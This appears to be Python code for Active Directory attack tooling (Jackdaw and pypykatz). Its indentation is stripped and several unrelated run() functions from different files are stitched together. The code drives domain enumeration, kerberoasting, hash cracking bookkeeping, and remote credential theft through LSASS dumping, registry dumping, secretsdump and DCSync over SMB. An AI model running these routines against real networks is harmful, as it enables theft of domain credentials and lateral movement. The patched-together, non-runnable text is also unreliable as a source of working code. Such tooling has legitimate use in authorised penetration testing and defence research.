'Connection URL base, target can be set to anything. Owerrides all parameter based connection settings! Example: "smb2+ntlm-password://TEST\\victim@test"'
)
parser.add_argument(
'targets',
nargs='*',
help='UNC paths of file eg. \\\\HOST\\SHARE\\file_or_folder')
args = parser.parse_args()
if args.verbose >= 1:
logger.setLevel(logging.DEBUG)
if args.verbose > 2:
print('setting deepdebug')
logger.setLevel(1) #enabling deep debug
asyncio.get_event_loop().set_debug(True)
logging.basicConfig(level=logging.DEBUG)
smb_url = None
if args.url is not None:
smb_url = args.smb_url
else:
try:
smb_url = SMBConnectionParams.parse_args(args)
except Exception as e:
print(
'Either URL or all connection parameters must be set! Error: %s'
% str(e))
sys.exit(1)
smbget = SMBGET(smb_url, show_progress=args.progress)
notfile = []
if len(args.targets) == 0 and args.stdin is True:
smbget.target_gens.append(ListTargetGen(sys.stdin))
else:
for target in args.targets:
try:
f = open(target, 'r')
f.close()
smbget.target_gens.append(FileTargetGen(target))
except:
notfile.append(target)
if len(notfile) > 0:
smbget.target_gens.append(ListTargetGen(notfile))
if len(smbget.target_gens) == 0:
print('[-] No suitable targets were found!')
return
await smbget.run()
def run(args):
if args.verbose == 0:
logging.basicConfig(level=logging.INFO)
jdlogger.setLevel(logging.INFO)
msldaplogger.setLevel(logging.WARNING)
smblogger.setLevel(logging.CRITICAL)
elif args.verbose == 1:
logging.basicConfig(level=logging.DEBUG)
jdlogger.setLevel(logging.DEBUG)
msldaplogger.setLevel(logging.INFO)
smblogger.setLevel(logging.INFO)
elif args.verbose > 1:
logging.basicConfig(level=1)
msldaplogger.setLevel(logging.DEBUG)
jdlogger.setLevel(1)
smblogger.setLevel(1)
if not args.sql:
print(
'SQL connection identification is missing! You need to provide the --sql parameter'
)
sys.exit()
db_conn = args.sql
if args.command == 'enum':
smb_mgr = construct_smbdef(args)
ldap_mgr = construct_ldapdef(args)
mgr = LDAPEnumeratorManager(db_conn,
ldap_mgr,
agent_cnt=args.ldap_workers)
adifo_id = mgr.run()
print('ADInfo entry successfully created with ID %s' % adifo_id)
mgr = SMBGathererManager(smb_mgr, worker_cnt=args.smb_workers)
mgr.gathering_type = ['all']
mgr.db_conn = db_conn
mgr.target_ad = adifo_id
mgr.run()
elif args.command == 'dbinit':
create_db(db_conn)
elif args.command == 'adinfo':
session = get_session(db_conn)
from jackdaw.dbmodel.adinfo import JackDawADInfo
from jackdaw.utils.table import print_table
rows = [['Ad ID', 'domain name', 'scantime']]
for did, distinguishedName, creation in session.query(
JackDawADInfo).with_entities(JackDawADInfo.id,
JackDawADInfo.distinguishedName,
JackDawADInfo.fetched_at).all():
name = distinguishedName.replace('DC=', '')
name = name.replace(',', '.')
rows.append([str(did), name, creation.isoformat()])
print_table(rows)
elif args.command == 'ldap':
ldap_mgr = construct_ldapdef(args)
ldap_conn = ldap_mgr.get_connection()
ldap_conn.connect()
mgr = LDAPEnumeratorManager(db_conn,
ldap_mgr,
agent_cnt=args.ldap_workers)
adifo_id = mgr.run()
print('ADInfo entry successfully created with ID %s' % adifo_id)
elif args.command in ['shares', 'sessions', 'localgroups']:
smb_mgr = construct_smbdef(args)
mgr = SMBGathererManager(smb_mgr)
mgr.gathering_type = [args.command]
mgr.db_conn = db_conn
mgr.lookup_ad = args.lookup_ad
if args.ldap_url:
ldap_mgr = construct_ldapdef(args)
ldap_conn = ldap_mgr.get_connection()
ldap_conn.connect()
mgr.ldap_conn = ldap_conn
if args.ad_id:
mgr.target_ad = args.ad_id
if args.target_file:
mgr.targets_file = args.target_file
mgr.run()
elif args.command == 'creds':
creds = JackDawCredentials(args.db_conn, args.domain_id)
creds.add_credentials_impacket(args.impacket_file)
elif args.command == 'passwords':
creds = JackDawCredentials(args.db_conn)
creds.add_cracked_passwords(args.potfile, args.disable_usercheck,
args.disable_passwordcheck)
elif args.command == 'uncracked':
creds = JackDawCredentials(args.db_conn, args.domain_id)
creds.get_uncracked_hashes(args.hash_type, args.history)
elif args.command == 'cracked':
creds = JackDawCredentials(args.db_conn, args.domain_id)
creds.get_cracked_info()
elif args.command == 'nest':
from jackdaw.nest.wrapper import NestServer
debug = bool(args.verbose)
server = NestServer(args.sql,
bind_ip=args.ip,
bind_port=args.port,
debug=debug)
server.run()
async def run(args):
try:
if args.silent is True:
print(__banner__)
if args.verbose == 0:
logging.basicConfig(level=logging.INFO)
jdlogger.setLevel(logging.INFO)
msldaplogger.setLevel(logging.CRITICAL)
smblogger.setLevel(100)
elif args.verbose == 1:
logging.basicConfig(level=logging.DEBUG)
jdlogger.setLevel(logging.DEBUG)
msldaplogger.setLevel(logging.WARNING)
smblogger.setLevel(logging.CRITICAL)
elif args.verbose > 1:
logging.basicConfig(level=1)
msldaplogger.setLevel(logging.DEBUG)
jdlogger.setLevel(1)
smblogger.setLevel(1)
if not args.sql and args.command != 'auto':
print(
'SQL connection identification is missing! You need to provide the --sql parameter'
)
sys.exit()
work_dir = './workdir'
ldap_url = None
smb_url = None
if hasattr(args, 'ldap_url'):
ldap_url = args.ldap_url
if hasattr(args, 'smb_url'):
smb_url = args.smb_url
db_conn = args.sql
if db_conn is not None:
os.environ['JACKDAW_SQLITE'] = '0'
if args.sql.lower().startswith('sqlite'):
os.environ['JACKDAW_SQLITE'] = '1'
else:
os.environ['JACKDAW_SQLITE'] = '1'
if args.command == 'enum':
with multiprocessing.Pool() as mp_pool:
gatherer = Gatherer(db_conn,
work_dir,
ldap_url,
smb_url,
kerb_url=args.kerberoast,
ldap_worker_cnt=args.ldap_workers,
smb_worker_cnt=args.smb_workers,
mp_pool=mp_pool,
smb_gather_types=['all'],
progress_queue=None,
show_progress=args.silent,
calc_edges=True,
ad_id=None,
dns=args.dns,
no_work_dir=args.no_work_dir)
res, err = await gatherer.run()
if err is not None:
raise err
elif args.command == 'auto':
_, err = await run_auto(ldap_worker_cnt=args.ldap_workers,
smb_worker_cnt=args.smb_workers,
dns=args.dns,
work_dir=work_dir,
show_progress=args.silent,
no_work_dir=args.no_work_dir)
if err is not None:
print(err)
elif args.command == 'dbinit':
create_db(db_conn)
elif args.command == 'adinfo':
session = get_session(db_conn)
from jackdaw.dbmodel.adinfo import ADInfo
from jackdaw.utils.table import print_table
rows = [['Ad ID', 'domain name', 'scantime']]
for did, distinguishedName, creation in session.query(
ADInfo).with_entities(ADInfo.id, ADInfo.distinguishedName,
ADInfo.fetched_at).all():
name = distinguishedName.replace('DC=', '')
name = name.replace(',', '.')
rows.append([str(did), name, creation.isoformat()])
print_table(rows)
elif args.command == 'ldap':
with multiprocessing.Pool() as mp_pool:
gatherer = Gatherer(db_conn,
work_dir,
ldap_url,
smb_url,
ldap_worker_cnt=args.ldap_workers,
smb_worker_cnt=None,
mp_pool=mp_pool,
smb_gather_types=['all'],
progress_queue=None,
show_progress=args.silent,
calc_edges=args.calculate_edges,
ad_id=args.ad_id,
no_work_dir=args.no_work_dir)
await gatherer.run()
elif args.command == 'kerberoast':
gatherer = Gatherer(db_conn,
work_dir,
None,
None,
kerb_url=args.kerberos_url,
ldap_worker_cnt=None,
smb_worker_cnt=None,
mp_pool=None,
smb_gather_types=[],
progress_queue=None,
show_progress=False,
calc_edges=False,
ad_id=args.ad_id)
await gatherer.run()
print('Kerberoast Finished!')
elif args.command in ['shares', 'sessions', 'localgroups', 'smball']:
if args.command == 'smball':
args.command = 'all'
gatherer = Gatherer(
db_conn,
work_dir,
ldap_url,
smb_url,
ad_id=args.ad_id,
ldap_worker_cnt=None,
smb_worker_cnt=args.smb_workers,
mp_pool=None,
smb_gather_types=args.command,
progress_queue=None,
show_progress=args.silent,
calc_edges=False,
dns=args.dns,
)
await gatherer.run()
elif args.command == 'dns':
gatherer = Gatherer(
db_conn,
work_dir,
None,
None,
ad_id=args.ad_id,
ldap_worker_cnt=None,
smb_worker_cnt=None,
mp_pool=None,
smb_gather_types=None,
progress_queue=None,
show_progress=args.silent,
calc_edges=False,
dns=args.dns,
)
await gatherer.run()
elif args.command == 'version':
print('Jackdaw version: %s' % jdversion)
print('MSLDAP version : %s' % ldapversion)
print('AIOSMB version : %s' % smbversion)
elif args.command == 'files':
raise Exception('not yet implemented!')
#if args.src == 'domain':
# if not args.ad_id:
# raise Exception('ad-id parameter is mandatory in ldap mode')
#
# mgr = SMBConnectionURL(args.smb_url)
# settings_base = SMBShareGathererSettings(args.ad_id, mgr, None, None, None)
# settings_base.dir_depth = args.smb_folder_depth
# settings_base.dir_with_sd = args.with_sid
# settings_base.file_with_sd = args.with_sid
#
# mgr = ShareGathererManager(settings_base, db_conn = db_conn, worker_cnt = args.smb_workers)
# mgr.run()
elif args.command == 'creds':
creds = JackDawCredentials(db_conn, args.domain_id)
creds.add_credentials_impacket(args.impacket_file)
elif args.command == 'passwords':
creds = JackDawCredentials(db_conn)
creds.add_cracked_passwords(args.potfile, args.disable_usercheck,
args.disable_passwordcheck)
elif args.command == 'uncracked':
creds = JackDawCredentials(db_conn, args.domain_id)
creds.get_uncracked_hashes(args.hash_type, args.history)
elif args.command == 'cracked':
creds = JackDawCredentials(db_conn, args.domain_id)
creds.get_cracked_info()
elif args.command == 'recalc':
with multiprocessing.Pool() as mp_pool:
gatherer = Gatherer(db_conn,
work_dir,
None,
None,
mp_pool=mp_pool,
progress_queue=None,
show_progress=args.silent,
calc_edges=True,
store_to_db=True,
ad_id=None,
graph_id=args.graphid)
await gatherer.run()
elif args.command == 'nest':
from jackdaw.nest.wrapper import NestServer
debug = bool(args.verbose)
server = NestServer(
args.sql,
bind_ip=args.ip,
bind_port=args.port,
debug=debug,
work_dir=args.work_dir,
graph_backend=args.backend,
)
server.run()
elif args.command == 'ws':
from jackdaw.nest.ws.server import NestWebSocketServer
server = NestWebSocketServer(args.listen_ip,
args.listen_port,
args.sql,
args.work_dir,
args.backend,
ssl_ctx=None)
await server.run()
elif args.command == 'bhimport':
from jackdaw.utils.bhimport import BHImport
print(
'DISCLAIMER! This feature is still beta! Bloodhound acquires way less data than Jackdaw therefore not all functionality will work after import. Any errors during import will be silently ignored, use "-vvv" verbosity level to see all errors.'
)
bh = BHImport.from_zipfile(args.bhfile)
bh.db_conn = db_conn
if args.verbose > 1:
bh.set_debug(True)
bh.run()
print('Import complete!')
except Exception as e:
jdlogger.exception('main')
async def run_auto(ldap_worker_cnt=None,
smb_worker_cnt=500,
dns=None,
work_dir='./workdir',
db_conn=None,
show_progress=True,
no_work_dir=False):
try:
if platform.system() != 'Windows':
raise Exception('auto mode only works on windows!')
smblogger.setLevel(100)
from winacl.functions.highlevel import get_logon_info
logon = get_logon_info()
jdlogger.debug(str(logon))
if logon['domain'] == '' or logon['logonserver'] == '':
if logon['domain'] == '':
logon['domain'] = os.environ['USERDOMAIN']
if logon['logonserver'] == '':
logon['logonserver'] = os.environ['LOGONSERVER'].replace(
'\\', '')
if logon['domain'] == '' or logon['logonserver'] == '':
return False, Exception(
"Failed to find user's settings! Is this a domain user?")
try:
#checking connection can be made over ldap...
reader, writer = await asyncio.wait_for(
asyncio.open_connection(logon['logonserver'], 389), 2)
writer.close()
except:
return False, Exception(
"Failed to connect to server %s over LDAP" %
(logon['logonserver']))
if db_conn is None:
db_loc = '%s_%s.db' % (logon['domain'], datetime.datetime.utcnow().
strftime("%Y%m%d_%H%M%S"))
db_conn = 'sqlite:///%s' % db_loc
create_db(db_conn)
ldap_url = 'ldap+sspi-ntlm://%s\\%s:jackdaw@%s' % (
logon['domain'], logon['username'], logon['logonserver'])
smb_url = 'smb2+sspi-kerberos://%s\\%s:jackdaw@%s' % (
logon['domain'], logon['username'], logon['logonserver'])
jdlogger.debug('LDAP connection: %s' % ldap_url)
jdlogger.debug('SMB connection: %s' % smb_url)
if dns is None:
from jackdaw.gatherer.rdns.dnstest import get_correct_dns_win
srv_domain = '%s.%s' % (logon['logonserver'],
logon['dnsdomainname'])
dns = await get_correct_dns_win(srv_domain)
if dns is None:
jdlogger.debug('Failed to identify DNS server!')
else:
dns = str(dns)
jdlogger.debug('DNS server selected: %s' % str(dns))
kerb_url = 'auto'
with multiprocessing.Pool() as mp_pool:
gatherer = Gatherer(db_conn,
work_dir,
ldap_url,
smb_url,
kerb_url=kerb_url,
ldap_worker_cnt=ldap_worker_cnt,
smb_worker_cnt=smb_worker_cnt,
mp_pool=mp_pool,
smb_gather_types=['all'],
progress_queue=None,
show_progress=show_progress,
calc_edges=True,
dns=dns,
no_work_dir=no_work_dir)
res, err = await gatherer.run()
if err is not None:
raise err
return True, None
except Exception as e:
return False, e
async def run(self, args):
from aiosmb import logger as smblog
if args.verbose == 0:
smblog.setLevel(100)
elif args.verbose == 1:
smblog.setLevel(level=logging.INFO)
else:
level = 5 - args.verbose
smblog.setLevel(level=level)
if args.smb_module == 'lsassfile':
from pypykatz.smb.lsassutils import lsassfile
mimi = await lsassfile(args.url)
self.process_results({'smbfile': mimi}, [], args)
elif args.smb_module == 'lsassdump':
from pypykatz.smb.lsassutils import lsassdump
mimi = await lsassdump(args.url)
self.process_results({'smbfile': mimi}, [], args)
elif args.smb_module == 'secretsdump':
from pypykatz.smb.lsassutils import lsassdump
from pypykatz.smb.regutils import regdump
from pypykatz.smb.dcsync import dcsync
try:
mimi = await lsassdump(args.url)
if mimi is not None:
self.process_results({'smbfile': mimi}, [],
args,
file_prefix='_lsass.txt')
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')
try:
po = await regdump(args.url)
if po is not None:
if args.outfile:
po.to_file(args.outfile + '_registry.txt', args.json)
else:
if args.json:
print(
json.dumps(po.to_dict(),
cls=UniversalEncoder,
indent=4,
sort_keys=True))
else:
print(str(po))
except Exception as e:
logging.exception(
'[SECRETSDUMP] Failed to get registry secrets')
try:
if args.outfile is not None:
outfile = open(args.outfile + '_dcsync.txt',
'w',
newline='')
async for secret in dcsync(args.url):
if args.outfile is not None:
outfile.write(str(secret))
else:
print(str(secret))
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')
finally:
if args.outfile is not None:
outfile.close()
elif args.smb_module == 'dcsync':
from pypykatz.smb.dcsync import dcsync
if args.outfile is not None:
outfile = open(args.outfile, 'w', newline='')
async for secret in dcsync(args.url, args.username):
if args.outfile is not None:
outfile.write(str(secret))
else:
print(str(secret))
if args.outfile is not None:
outfile.close()
elif args.smb_module == 'regdump':
from pypykatz.smb.regutils import regdump
po = await regdump(args.url)
if po is not None:
if args.outfile:
po.to_file(args.outfile, args.json)
else:
if args.json:
print(
json.dumps(po.to_dict(),
cls=UniversalEncoder,
indent=4,
sort_keys=True))
else:
print(str(po))
elif args.smb_module == 'regfile':
from pypykatz.smb.regutils import regfile
po = await regfile(args.url,
args.system,
sam=args.sam,
security=args.security,
software=args.software)
if po is not None:
if args.outfile:
po.to_file(args.outfile, args.json)
else:
if args.json:
print(
json.dumps(po.to_dict(),
cls=UniversalEncoder,
indent=4,
sort_keys=True))
else:
print(str(po))
elif args.smb_module == 'console':
from aiosmb.examples.smbclient import amain
la = SMBCMDArgs()
la.smb_url = args.url
la.verbose = args.verbose
if args.commands is not None and len(args.commands) > 0:
la.commands = []
if args.commands[0] == 'help':
la.commands = ['help']
else:
if args.commands[0] != 'login':
la.commands.append('login')
for command in args.commands:
la.commands.append(command)
await amain(la)
